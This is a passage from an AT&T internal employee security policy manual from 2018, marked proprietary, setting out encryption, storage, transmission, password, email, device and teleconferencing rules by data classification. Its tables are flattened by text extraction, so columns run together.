AT&T information is stored on many types of media and electronic devices, sometimes inside and sometimes outside of AT&T controlled space.
However,
1. AT&T proprietary information or Customer data must not be stored on electronic media or devices that are not controlled by either AT&T
or those under contract to AT&T (see ASPR-0113 Non-AT&T Owned Software, Hardware and Media.
2. AT&T proprietary information must not be placed on computer workstations that are available for shared use in visitor centers, public
computing facilities and similar environments.
3. The storage of authentication credentials is subject to ASPR-0444: Authentication Credential Protection and ASPR-0443: Two Factor
Authentication Credentials.

The following table defines on which types of media and devices AT&T information can and cannot be stored; and what other additional controls,
such as encryption are required when “at rest”.
AT&T Proprietary (Internal Use AT&T Proprietary
Location
Only) (Restricted)

Systems solely within AT&T Encryption not required. Should store non-transient data encrypted.
controlled space

Portable External Storage Devices Encryption not required. Should not be copied from primary sources and stored on such media
(excluding Mobile Computing unless there is a business need.
Devices) Where there is a business need
1. Must store encrypted, with the exception of
or
a. Media that remains in AT&T controlled space as part of a
Removable Portable Media documented business process,
— or —
b. Individual customer information for shipping to
customers on electronic media.

Mobile Computing Devices Encryption not required Must not be stored except where there is a business need.
—————
Where there is a business need then written approval must be
obtained (and retained) from an Officer of AT&T (level 6 or higher), and
must store non- transient data encrypted.
—————

P a g e | 15
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
AT&T Proprietary (Internal Use AT&T Proprietary
Location
Only) (Restricted)

If a user receives AT&T Proprietary (Secure Restricted) data in an

unsolicited fashion (e.g. by email) and is not compliant with all of the
above, then the user must delete the data immediately.

Systems/devices permanently or Encryption not required Must where Technically Feasible store non- transient data encrypted
temporarily outside AT&T except for systems subject to differing contractual commitments.
Controlled Spaces (excluding —————
"Mobile computing devices")
Should store non-transient data encrypted for systems subject to
differing contractual commitments.

Supplier Provided Cloud Services Must store encrypted by the Must store encrypted by the service or on an AT&T system prior to
• Non-AT&T provided Software-as- service or on an AT&T system storage in the cloud (compliance is required by 30th April 2018).
a-Service (E.g. Box, Cisco Spark, prior to storage in the cloud
Microsoft OneDrive, SalesForce, (compliance is required by 30th NOTE: Encryption is not required on the AT&T system prior to
Slack) April 2018). transmission for storage in the cloud.
- or -
• Non-AT&T provided Platform-as- NOTE: Encryption is not
a-Service (E.g. Force.com) required on the AT&T system
- or - prior to transmission for storage
• Non-AT&T provided in the cloud.
Infrastructure-as-a-Service (E.g.
Amazon AWS, Microsoft Azure,
Oracle Public Cloud)
(see ASPR-0431: PS - Partner
Security and ASPR-1027: Supplier
Provided Cloud Service)

AT&T Proprietary AT&T Proprietary

Location
(Secure Restricted) (Sensitive Personal Information)

Systems solely within AT&T controlled space Should store non-transient data encrypted. Must store non-transient data encrypted.

Portable External Storage Devices (excluding Must not be stored except where there is a Must not be stored except where there is a
Mobile Computing Devices) business need to transfer data between AT&T business need to transfer data between AT&T
locations or storage of backups from official locations or storage of backups from official
or company data centers. company data centers.

Removable Portable Media

Where there is a business need then Where there is a business need then
 Written approval must be obtained  Written approval must be obtained
(and retained) from an Officer of (and retained) from an Officer of
AT&T (Level 6 or higher), AT&T (Level 6 or higher),
— and — — and —
 Must store encrypted.  Must store encrypted.

Mobile computing devices Must not be stored except where there is a Must store non-transient data encrypted.
business need.
—————
Where there is a business need then written
approval must be obtained (and retained)
from an Officer of AT&T (level 6 or higher), and
must store non- transient data encrypted.

P a g e | 16
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
AT&T Proprietary AT&T Proprietary
Location
(Secure Restricted) (Sensitive Personal Information)

—————
If a user receives AT&T Proprietary (Secure
Restricted) data in an unsolicited fashion (e.g.
by email) and is not compliant with all of the
above, then the user must delete the data
immediately.

Systems/devices permanently or temporarily Must not be stored except where there is a Must not be stored except where there is a
outside AT&T Controlled Spaces (excluding business need. business need.
Non-AT&T provided file storage services)
Where there is a business need then written Should not be taken outside AT&T controlled
approval must be obtained (and retained) space, but if there is an overriding business
from an Officer of AT&T (Level 6 or higher), need to do so then written approval must be
and must store non-transient data encrypted. obtained (and retained) from an Executive
Director (Level 4), and must store non-
transient data encrypted.

Supplier Provided Cloud Services Must not be stored except where there is a Must not be stored except where there is a
• Non-AT&T provided Software-as-a-Service business need. business need.
(E.g. Box, Cisco Spark, Microsoft OneDrive, ————— —————
SalesForce, Slack) Where there is a business need: Where there is a business need:
- or - •Must store encrypted (compliance is •Must store encrypted (compliance is
• Non-AT&T provided Platform-as-a-Service required by 30th April 2018). required by 30th April 2018).
(E.g. Force.com) •Should encrypt on an AT&T system prior to •Should encrypt on an AT&T system prior to
- or - storage in the cloud. storage in the cloud.
• Non-AT&T provided Infrastructure-as-a- •AT&T should own the encryption key. •AT&T should own the encryption key.
Service (E.g. Amazon AWS, Microsoft Azure, •Written approval must be obtained (and •Written approval must be obtained (and
Oracle Public Cloud) retained) from an Officer of AT&T (level 6 or retained) from an Executive Director (level 4 or
(see ASPR-0431: PS - Partner Security and higher). higher).
ASPR-1027: Supplier Provided Cloud Service)

Sensitive Customer Data

(When processed by an AT&T service or an
Non-Sensitive Customer Data AT&T employee or contractor)
Location (When processed by an AT&T service or an — or —
AT&T employee or contractor) Any Customer Data from a Conduit
(When processed by an AT&T employee or
contractor)

Systems solely within AT&T controlled space Encryption not required. Must store non-transient data encrypted.
————— —————
Should not be copied from primary sources Should not be copied from primary sources
unless there is a business need. unless there is a business need.
————— —————
Where there is a business need then: Where there is a business need then:
Written approval must be obtained (and Written approval must be obtained (and
retained) from an Executive Director (Level 4) retained) from an Executive Director (Level 4)

Portable External Storage Devices (excluding Should not be copied from primary sources Must not be stored except where there is a
Mobile Computing Devices) and stored on such media unless there is a business need to transfer data between AT&T
business need. locations, storage of backups from official
or ————— company data centers or ship a customer's
Where there is a business need: data to the customer on electronic media.
Removable Portable Media 1. Written approval must be obtained (and —————
retained) from an Executive Where there is a business need to:

P a g e | 17
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
Sensitive Customer Data
(When processed by an AT&T service or an
Non-Sensitive Customer Data AT&T employee or contractor)
Location (When processed by an AT&T service or an — or —
AT&T employee or contractor) Any Customer Data from a Conduit
(When processed by an AT&T employee or
contractor)

Director(Level 4) 1. Transfer data between AT&T location or

2. Must store encrypted, with the exception storage of backups from official company
of: data centers, then:
a. Media that remains in AT&T controlled a. Written approval must be obtained (and
space as part of a documented business retained) from an Executive Director
process (Level 4)
— or — — and —
b. Customer data for shipping to customers b. Must store encrypted.
on electronic media. — or —
2. Ship a customer's data to the customer
on electronic media, then:
a. Must store encrypted.
— or —
b. Written liability waiver must be obtained
from the customer releasing AT&T from
any future liability, reviewed AT&T Legal,
and retained prior to shipping the data to
the customer. The liability waiver must
note that the customer data comes from
a service determined as processing
sensitive customer data

Mobile computing devices Should store non-transient data encrypted. Must store non-transient data encrypted.
————— —————
Should not be copied from primary sources Should not be copied from primary sources
and stored on such devices unless there is a and stored on such devices unless there is a
business need. business need.
————— —————
Where there is a business need: Where there is a business need:
•Written approval must be obtained (and •Written approval must be obtained (and
retained) from an Executive Director (Level 4) retained) from an Executive Director (Level 4)
•Must store encrypted. •Must store encrypted.

Systems/devices permanently or temporarily Must store non-transient data encrypted. Must not be stored except where there is a
outside AT&T Controlled Spaces (excluding ————— business need.
Non-AT&T provided file storage services) Should not be copied from primary sources —————
unless there is a business need. Where there is a business need:
————— •Written approval must be obtained (and
Where there is a business need: retained) from an Executive Director (Level 4)
•Written approval must be obtained (and •Must store encrypted.
retained) from an Executive Director (Level 4)
•Must store encrypted.

P a g e | 18
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
Sensitive Customer Data
(When processed by an AT&T service or an
Non-Sensitive Customer Data AT&T employee or contractor)
Location (When processed by an AT&T service or an — or —
AT&T employee or contractor) Any Customer Data from a Conduit
(When processed by an AT&T employee or
contractor)

• Non-AT&T provided Infrastructure-as-a- •Written approval must be obtained (and •Written approval must be obtained (and
Service (E.g. Amazon AWS, Microsoft Azure, retained) from an Executive Director (level 4 or retained) from an Executive Director (level 4 or
Oracle Public Cloud) higher). higher).

HINT: Please contact your help desk or technical support for assistance in encrypting proprietary information.

KEY POINT: There are many portable devices capable of storing information including USB thumb drives, personal digital assistants and even
digital cameras. Because of their small and transportable nature, they are prone to loss, theft or unauthorized use and access. Any storage of
AT&T Proprietary information on such portable devices must be controlled by AT&T personnel at all times and must be protected in accordance
with ASPR.

(All Employees) – Effective January 1, 2017 all systems must be configured to prevent read or write access to any portable storage such as USB
thumb drives, CDs or DVDs. See ASPR-0222: End User Device Access to External Data Storage and Appendix B.

Transmitting Electronic Information

Content Source: ASPR-0179: Transmission of Electronic Data
The following tables define when AT&T Proprietary information requires encryption when transmitted over networks.
AT&T Proprietary
Location AT&T Proprietary (Internal Use Only)
(Restricted)

Completely within AT&T controlled Encryption not required. Should transmit encrypted
facilities and network
Must transmit encrypted all authentication credentials used
to access AT&T Proprietary (Sensitive Personal Information)
or systems containing AT&T Proprietary (Sensitive Personal
Information) with the exception of one-time authentication
credentials created in accordance with ASPR-0445:
Temporary Authentication Credentials which should be
transmitted encrypted.

Partially or completely outside AT&T Should transmit encrypted. If using a dedicated private line or VPN should transmit
controlled facilities and network encrypted.

If not using a dedicated private line or VPN then must

transmit encrypted.

P a g e | 19
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
AT&T Proprietary
Location AT&T Proprietary (Internal Use Only)
(Restricted)

The customer's access to their own N/A Must transmit encrypted.

customer details or customer data

Supplier Provided Cloud Services Must transmit encrypted Must transmit encrypted
 Non-AT&T provided Software-as-a-
Service (E.g. Box, Cisco Spark,
Microsoft OneDrive, SalesForce,
Slack)
- or -
 Non-AT&T provided Platform-as-a-
Service (E.g. Force.com)
- or -
 Non-AT&T provided Infrastructure-
as-a-Service (E.g. Amazon AWS,
Microsoft Azure, Oracle Public
Cloud)
(see ASPR-0431: PS - Partner Security
and ASPR-1027: Supplier Provided Cloud
Service)

AT&T Proprietary AT&T Proprietary

Location
(Secure Restricted) (Sensitive Personal Information)

Completely within AT&T controlled Must transmit encrypted Must transmit encrypted
facilities and network

Partially or completely outside AT&T Must transmit encrypted Must transmit encrypted
controlled facilities and network

P a g e | 20
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
Sensitive Customer Data
(When processed by an AT&T service or an
Non-Sensitive Customer Data
AT&T employee or contractor)
(When processed by an AT&T
Location — or —
service or an AT&T employee
Any Customer Data from a Conduit
or contractor)
(When processed by an AT&T employee or
contractor)

Completely within AT&T AT&T employees or Encryption not required. Should transmit encrypted.
controlled facilities and contractors with a business
network need
— or —
Between two Systems under
AT&T control

Partially or completely outside AT&T employees or Encryption not required, but Must transmit encrypted.
AT&T controlled facilities and contractors with a business recommended where
network need technically feasible.
— or —
Between two Systems under
AT&T control

The customer's access to Encryption not required, but Should transmit encrypted for Commercial
their own customer details or recommended where email services provided to AT&T customers.
customer data technically feasible. ———
Otherwise, must transmit encrypted.

Those explicitly authorized by Encryption not required. Encryption not required.

the customer, other than
those in the role of AT&T
employees/contractors with a
business need

Supplier Provided Cloud AT&T employees/contractors Must transmit encrypted. Must transmit encrypted.
Services with a business need
 Non-AT&T provided
Software-as-a-Service (E.g.
Box, Cisco Spark, Microsoft
OneDrive, SalesForce,
Slack)
- or -
 Non-AT&T provided
Platform-as-a-Service (E.g.
Force.com)
- or -
 Non-AT&T provided
Infrastructure-as-a-Service
(E.g. Amazon AWS,
Microsoft Azure, Oracle
Public Cloud)

P a g e | 21
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
AT&T Information: High Level Policy and Requirements
Overview
The ASPR contains both general and detailed standards for the entire company to follow in safeguarding company, customer and employee
information, computers and networks, and the good name of the company.

Responsibilities

Compliance
Content Source: ASPR-0481: Statement of Compliance
Compliance with all applicable ASPR requirements is necessary to protect AT&T's corporate assets, as well as, the information and assets of others
AT&T is obligated to protect. They allow the use, access, or disclosure of such assets only in accordance with AT&T corporate interests, as well as,
applicable laws and regulations. Adherence demonstrates a responsible approach by the Company to its fiduciary responsibilities.
Failure to comply with applicable ASPR requirements and/or legally-binding agreement, except where local laws prohibit, can result in violation of
AT&T Code of Business Conduct (COBC).

Manager Responsibilities
Content Source: ASPR-0741: Manager Responsibilities
Managers are responsible for confirming business needs for subordinates, and for contractors the manager sponsors, requesting access to AT&T
resources, except where an attribute based access control (including role based access control).

Content Source: ASPR-0149: Clean Desk Policy

Managers should periodically (recommend every six months) check that the requirements for use and storage of proprietary information as
described in ASPR-0171: Using and Storing AT&T Proprietary Information - Printed Material; and ASPR-0177: Protecting Electronic Media and
Mobile Devices are adhered to by their direct reports. Where a manager is not able to perform such a review he/she may either delegate the task
to a local manager who is authorized to see that team's data, or may direct members of a work group to perform a self-assessment. Managers
should maintain a record of the dates when the checks are carried out and who carried them out.

User Responsibilities
Content Source: ASPR-0030: User Responsibilities
Users must not only comply with all ASPR requirements, but also any security requirements defined by the teams that support their devices.
Where the support teams install utilities on end-user devices in order to meet the ASPR guidelines, these utilities must not be disabled, or
prevented from functioning.

Security Training
Content Source: ASPR-0039: Security Training
All AT&T employees and contractors must complete security training as established by CSO and/or AT&T Corporate Compliance.

Suspicious Activity
Content Source: ASPR-0474: Security Incidents
Any suspicious or unusual activity, which may indicate an attempt to breach the integrity of AT&T's networks and systems, and/or suspected
misuse of company assets must be reported immediately to the AT&T Computer Security Incident Response Team (ACSIRT).

Reporting Security Flaws

Content Source: ASPR-0015: Security Alerts and Advisories: Reporting Security Flaws
Users who become aware of security flaws in software must report them to whoever provided them with the software or hardware (e.g. technical
support group, external vendor, etc.)

P a g e | 22
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
NOTE: Security flaws in software might be techniques that people can use to bypass built-in security such as authentication or timeouts, or ways
to elevate permissions to update data they should not update.

UserID and Password

AT&T Employee Userid — ATTUID

Content Source: ASPR-0043: AT&T Employee Userid — ATTUID
All AT&T employees are assigned a unique and personal userid.

Content Source: ASPR-0046: Group Userids

When business needs require that several individuals share one userid, a group userid must be created, and controlled and monitored by one
responsible employee. This employee must maintain the password of the userid. System or application documentation must identify the
responsible employee.
All group userids must be approved by CSO.

Password Rules
Content Source: ASPR-0062: Password Changes, ASPR-1010: Password Length and Complexity
a. Passwords must be at least eight (8) characters in length.
b. Passwords must include characters from at least two (2) of these groupings: alpha, numeric, and special characters.
 Be cautious of special characters that may have command functions.
c. Passwords must not be the same as the userid with which they are associated.
All users / administrators must comply with the following requirements when selecting passwords.
a. New passwords must not contain a sequence of three (3) or more characters from the previous password.
Passwords must be changed according to the frequencies contained in the table below:

Password or Userid Type Change Requirements

Any passwords — if compromised Immediately or as directed by Chief Security Office (CSO)

Default passwords Immediately

Initial or Temporary passwords At first login
General Userids, Administrative Userids, or Network Infrastructure 8-11 Chars: Every 90 days or sooner
>11 Chars: Every 180 days

KEY POINT: In most cases, password changing requirements are enforced by AT&T systems.

Unsuccessful Login Attempts

Content Source: ASPR-0057: Unsuccessful Login Attempts
HINT: After a maximum of six (6) consecutive unsuccessful attempts to login to a system, the User's ID is automatically disabled for at least 3
minutes.

P a g e | 23
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
Security on the AT&T Network

Peer-to-Peer File Sharing

Content Source: ASPR-0101: Peer-to-Peer File Sharing
Peer-to-peer file sharing must not be used except when all of the following criteria are met:
a. The intent is to conduct AT&T business,
b. The application is TSS approved,
c. The communication is only across the AT&T Internal Network,
–and-
d. It is not to be used to circumvent security controls.

Wireless Communication with Peripherals

Content Source: ASPR-0102: Wireless Communication with Peripherals
Wireless technologies (e.g. Bluetooth, Infrared) must not be used for communicating between a device and a peripheral unless both:
a. The confidentiality of the communication is guaranteed, and
b. Unauthorized access to the device and the peripheral are prevented.
In addition, all such technologies must be disabled when not in use.

KEY POINT: There are many wireless devices used by consumers including personal digital assistants, wireless headsets for cell phones and
wireless USB adapters for computers. Any connections of these devices to AT&T equipment or networks must be in compliance with ASPR.

Email Security
Content Source: ASPR-0106: Email Security
Administrators and personnel who use electronic mail system to send or receive AT&T Proprietary information must implement appropriate
security controls to assist them in protecting incoming and outgoing messages as follows:
A. The message originator must ensure that it is clearly marked to reflect its proprietary classification.
B. The message originator must ensure that the email ID to which the information is being sent is correct. AT&T personnel should use email
directory searches to verify the recipient's email ID.
C. The recipient of the email message must understand the safeguards associated with the proprietary marking. The originator of the email
message may have to explain the safeguards to the recipient of the email message in advance.
D. If printed, the email message must be protected according to the rules associated with its proprietary marking.
E. The proprietary information must be encrypted in accordance with ASPR-0176: Storage of Electronic Data, ASPR-0179: Transmission of
Electronic Data.
F. AT&T internal mail must not be automatically forwarded out of AT&T's internal network, such as via the Internet, to any other mail
system.
G. AT&T employees and contractors must only use an "att.com" domain email address to conduct AT&T business unless otherwise obligated
to do so on behalf of AT&T through a formal contractual document.
H. AT&T corporate database systems, e.g. WebPhone, GAL or Non Payroll Database, which are used to define the contact details for
personnel performing work on behalf of AT&T must only contain email addresses within the "att.com" domain, e.g. RM-nsp@ att.com).
Other email address domains may be used for personnel employed by or affiliated with an External Entity (e.g. business partners, joint
venture partners, subsidiaries, contractors, vendors, suppliers) that is covered by a legal agreement that contains the Supplier
Information Security Requirements (found at: http://cso.att.com/ContractSecurity/Main.html ).

Note: Databases used for other purposes, such as customer/supplier contact, may contain non "att.com" domain addresses.

I. Auto Replies / Out of office messages;

1. May be sent in reply to emails received from internal or external email sources. However, when such functions are used the
originator must ensure that the classification of the data contained does not exceed that appropriate to anyone who might
receive it, and so the reply message must not contain any AT&T Proprietary information. The content of an out of office message
should be limited to providing alternate contact information.
2. May be received for emails sent to internal or external email destinations.
J. Successful "delivery report" messages:
1. May be sent in reply to emails received from internal email sources, but are not permitted in reply to emails received from
external email sources.
2. May be received for emails sent to internal or external email destinations.

P a g e | 24
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
K. Unsuccessful "non-delivery report" messages:
1. May be sent in reply to emails received from internal or external email sources.
2. May be received for emails sent to internal or external email destinations.
L. The sender's display name:
1. May be sent in emails destined to internal or external email destinations.
2. May be received for emails sent by internal or external email destinations.
M. AT&T e-mail systems are not to be used to send, forward or reply to chain letters, hoaxes or virus warnings.
N. AT&T e-mail systems are not to be used to distribute executable files (see ASPR-0109 Distribution of Software).

HINT: AT&T routinely and automatically blocks email attachments with certain file extensions. CSO website has a webpage with complete and
current details.

Computer Viruses and Malicious Code

Content Source: ASPR-0116: Computer Viruses and Malicious Code
The essential trustworthiness of the software and systems used to conduct Company business can be adversely affected by viruses and other
malicious code. TSS approved endpoint security software can be found here: http://cso.att.com/AntiVirus/index.html

All supported platforms must use the latest version of the endpoint security software when made available. For advice on what platforms are
supported, contact GET ETO Security or Chief Security Office (CSO) AV teams.

Where the installation of endpoint security software would not be allowed in accordance with vendor support terms (see ASPR-0108: Authorized
Software Use) for that platform, e.g., an appliance or router, then contact GET ETO Security or Chief Security Office (CSO) AV team for direction on
what compensating controls must be used.

Security Analysis
Content Source: ASPR-0018: Security Analysis
Performing security analysis of AT&T networks, computers, applications or services is the responsibility of AT&T. Using external vendors or
consultants to perform security analysis on AT&T computing resources is expressly prohibited unless written approval has been obtained from
AT&T CSO. Regardless of who performs the security analysis, results of any of these tests or analyses are AT&T property, and must be classified as
AT&T Proprietary (Restricted) information (see ASPR-0152: AT&T Proprietary (Restricted)).

Security analysis must take place in accordance with the following tables:

NOTES:
1. See CSO Security Compliance and Vulnerability Management (CSO SCVM) website for further information.
2. Compliance with the following tables is not required until 30th April 2018.

Table 0018a - Applications

Responsible
Resource Type Source Code Dynamic Analysis Penetration Testing
Org

AT&T Developed or Annually for Internet Facing

Modified Applications and high criticality
— OR — Each code release OR applications as defined in
3rd Party Applications BU Each code release monthly (Whichever occurs MOTS
Developed or Customized first) (See ASPR-0021: Application
for AT&T Inventory Database of
Record)
(Operating within AT&T Will perform compliance Will perform compliance Annually (PCI Internet Facing
Controlled Facility) CSO
validation and oversight. validation and oversight. Only)

Annually for Internet Facing

AT&T Controlled Each code release OR
and high criticality
Applications BU Each code release monthly (Whichever occurs
applications as defined in
first)
MOTS

P a g e | 25
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
(Operating within Supplier (See ASPR-0021: Application
Provided Cloud Service) Inventory Database of
Record)

Will perform compliance Will perform compliance Annually (PCI Internet Facing
CSO
validation and oversight. validation and oversight. Only)

Vendor to provide
Vendor to provide Vendor to provide
3rd Party Applications verification status that
verification status that verification status that
Developed or Customized vulnerability scanning is
vulnerability scanning is part vulnerability scanning is part
for AT&T part of their standard
BU process.
of their standard process. of their standard process.

(Operating within Vendor See ASPR-0431: PS - Partner See ASPR-0431: PS - Partner

space) See ASPR-0431: PS - Partner
Security Security
Security

Table 0018b - Other Resource Types

Responsible
Resource Type Frequency Penetration Testing
Org

Annually for Internet Facing and

Conduct vulnerability scans with each code release high criticality applications as
BU OR monthly. defined in MOTS.
Databases (Whichever occurs first) (See ASPR-0021: Application
Inventory Database of Record)

Will perform compliance validation

CSO Will perform compliance validation and oversight.
and oversight.

Annually for Internet Facing and

high criticality applications as
Hosts BU Weekly configuration/vulnerability check. defined in MOTS.
(via Host Based Testing) (See ASPR-0021: Application
Inventory Database of Record)
(See ASPR-0031: Host Weekly host based testing:
Based Testing) 1. Using agent installed on the system
CSO Annually (PCI Internet Facing Only)
— and/or —
2. Using remote authenticated access

Network Connected BU N/A N/A

Devices
(Discovery and 1. Discovery – Continuous across all network
Vulnerability via Network segments.
Based Testing) CSO 2. Vulnerability – Weekly network based N/A
testing (not using remote authenticated
(See ASPR-0022: Network system access).
Based Testing)

See:
 ASPR-0299: Service Realization
 ASPR-0306: Service Realization: Service Test Phase
 Application development, see the Application Security Standards baseline
 ASPR-0422: Application and Data Security: Assessment, Testing, Packaging and Mobile Code Controls for Development of Applications for
Handheld Mobile Systems

P a g e | 26
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
Personal Computer Security

Obtaining Files or Software

Content Source: ASPR-0110: Obtaining Files of Software
Where the end user directly obtains/downloads files or software then they are responsible for complying with the following requirements,
however where a central AT&T authority obtains/downloads the files or software then disseminates them then they are responsible for complying
with the following requirements:
1. All files and software must be obtained from trusted sources,
— and —
2. All files and software must be scanned for viruses and malicious code (see ASPR-0116: Computer Viruses and Malicious Code),
— and —
3. All files and software should be validated using digital signatures where available,
— and —
4. Any binary or executable files obtained from un-trusted sources on the Internet, must be verified to be free of logic bombs or other
malicious code before being used.
See ASPR-0108: Authorized Software Use and ASPR-0643: Purchased Products and Applications.

KEY POINT: Any files obtained from un-trusted sources on the Internet, must be verified to be free of malicious code before being used.

Non-AT&T Owned Software, Hardware and Media

Content Source: ASPR-0113: Non-AT&T Owned Software, Hardware and Media
AT&T owned hardware, software and media should always be used wherever possible.
Personally owned electronic storage media must not be used for anything beyond incidental transfer of AT&T information where the data is
deleted from the media after the transfer is completed.
Non-AT&T owned software and hardware must not be used in support of AT&T business, to connect to AT&T's internal networks or to hold the
confidential, proprietary or trade secret data of AT&T, or such data of any other party, such as a customer or employee, which AT&T is obligated to
protect (this would include AT&T Proprietary data and customer data) except under the following conditions and authorizations:
1. Where a supplier or a Non-Staff Supplementation (NSS) Non-Payroll Worker (NPW) is performing work on behalf of AT&T, by a written
agreement that fully complies with the ASPR requirements referenced within ASPR-0431: PS – Partner Security
— or —
2. For an AT&T employee, contractor, or Staff Supplementation (SS) Non-Payroll Worker (NPW), by an approval from an individual in the
user's Supervisory management hierarchy (retained for audit purposes by both the user and the approving manager) either:
a. When the following requirements are satisfied:
i. The AT&T proprietary data or data that AT&T is responsible to protect, must not be placed at increased risk, and must
be protected from unauthorized disclosure, destruction or modification.
ii. The software must be licensed.
iii. The software and hardware must be fully compliant with ASPR (e.g., security fixes, anti-virus software, personal
firewall, VPN).
iv. The software and hardware must not disrupt the operation of AT&T systems.
v. The software and hardware must not disable or conflict with the operation of any Technology Strategies and
Standards (TSS) approved security software.
vi. The software and hardware must not enable an insecure path from the Internet to the corporate WAN.
vii. The software and hardware must only support wireless connections compliant with ASPR-0468: Remote Access (e.g.
using AT&T approved VPNs).
viii. Its use is consistent with TSS guidelines and/or exception process at: (http://tss.att.com/home.cfm).
— or —
b. When using a personal device (BYOD) for only voice calling functionality or with AT&T approved BYOD software (e.g., HVD thin
client accessing an internally hosted AT&T HVD environment) that is using no functionality other than which the software
allows (e.g. screen image functionality).
The only exception being where there is a business need for AT&T employees to be able to access AT&T proprietary data for disaster recovery
purposes. In which case the employees must be pre-authorized by an officer of AT&T (level 6 or higher) access the data using a non-compliant

P a g e | 27
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
device as a matter of last resort. The authorization must be maintained in writing (email acceptable) by the officer and must be reauthorized every
twelve (12) months.

AT&T reserves all rights with regard to its data, and data for which it is responsible, and as such reserves the right to inspect, examine or
forensically investigate all non-AT&T owned hardware, software, media and associated data used in support of AT&T business just as it would for
AT&T owned hardware, software and media.

Teleconferencing
Content Source: ASPR-0291: Teleconferencing: AT&T Proprietary (Internal Use Only)
Where a conference call or online meeting will discuss only AT&T Proprietary (Internal Use Only) information, the following requirements apply:

a. The meeting invitation must state the classification of information that will be discussed.
b. Except for normal business-as-usual meetings, such as staff meetings or regular project meetings, the conference host should state the
classification of information to the attendees at the start of the meeting. Some judgment and discretion is permitted.
c. When a meeting is to be recorded, the host must state the classification of information at the start of the meeting.
d. Except for normal business-as-usual meetings, such as staff meetings or regular project meetings, the Host should ask that only people
with a reason to hear the information stay on the call. Some judgment and discretion is permitted.
e. Any attendee must state if he or she knows that someone is on the call who should not be attending.

See:
 ASPR-0194: Non-Disclosure Agreements (NDA)
 ASPR-0195: Sharing Information
 ASPR-0196: External Disclosure of AT&T Proprietary Information
 ASPR-0292: Teleconferencing: More Restrictive Classifications

Content Source: ASPR-0292: Teleconferencing: More Restrictive Classifications

Where a conference call or online meeting will discuss information that is AT&T Proprietary (Restricted), AT&T Proprietary (Secure Restricted) or
AT&T Proprietary (Sensitive Personal Information), the following requirements apply:

1. Before the Meeting

a. The meeting invitation or agenda must state the classification(s) of information that will be discussed.
b. The meeting invitation must alert invitees not to forward the meeting invitation to other persons without the permission of the
meeting host or unless it is obvious that the person to be invited is appropriate for the discussion and has a business need to attend.
Anyone forwarding an invitation should notify the host that the invitation was forwarded except when the person forwarding the
invitation or the recipient would ordinarily have the right to share the information to be presented at the meeting.
c. Where possible, meetings should use one-time meeting codes that allow participants to join the meeting.
d. Sharing AT&T Proprietary (Sensitive Personal Information) on a conference call or online meeting could violate US and international
privacy laws if all attendees are not identified and authorized to share that information. These meetings should not be recorded.
(See ASPR-0206: Pre-Classified Data Elements).
e. Sharing AT&T Proprietary (Secure Restricted) information on a conference call or online meeting could severely and substantially
harm AT&T if all attendees are not identified and authorized to share that information. Only an Officer of AT&T may authorize
disclosure of this information or authorize an individual to receive this information. These meetings should not be recorded and may
only be recorded with the explicit permission of an Officer of AT&T (Level 6 or higher). (See ASPR-0211: AT&T Proprietary (Secure
Restricted).
2. At the Start of the Meeting
a. The Host should state the classification of information to the attendees at the start of the meeting.
b. When a meeting is to be recorded, the host must state the classification of information at the start of the meeting.
c. Where a meeting will include a discussion of less restrictive information with persons not authorized to discuss the restrictive
information in the call, the agenda must be established so that any person not authorized for the more restrictive information will
be on the call only for the information that the person is authorized to share.
d. The Host or a delegate must make certain that all attendees are appropriate to the call.
e. All attendees should identify themselves on online meetings. This requirement may be satisfied by use of the online attendee
identification features in some tools such as AT&T Connect, Live Meeting or Net Meeting. Where the number of attendees is large,
there must be a process to identify everyone.

P a g e | 28
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
f. The meeting must not continue if there is uncertainty about the appropriateness of anyone attending the meeting. All unknown
attendees must be identified.
g. The meeting may continue once it is clear that anyone not authorized has left the meeting.
3. During the Meeting
a. Attendees must try to be aware of the presence of unauthorized individuals in the vicinity when listening to the audio portion of a
conference over speaker-phone or computer speakers.
b. Attendees must not view the meeting presentation in public places or in places where unauthorized persons may observe the
meeting content.
c. Attendees must not use speakerphones in public places or in places where unauthorized persons may overhear the meeting.
d. Attendees in open spaces in AT&T facilities must consider turning off monitors or flipping down laptop screens when walking away
from their desk during the meeting.

Third Party Access to AT&T Resources

Content Source: ASPR-1015: Third Party Access to AT&T Information
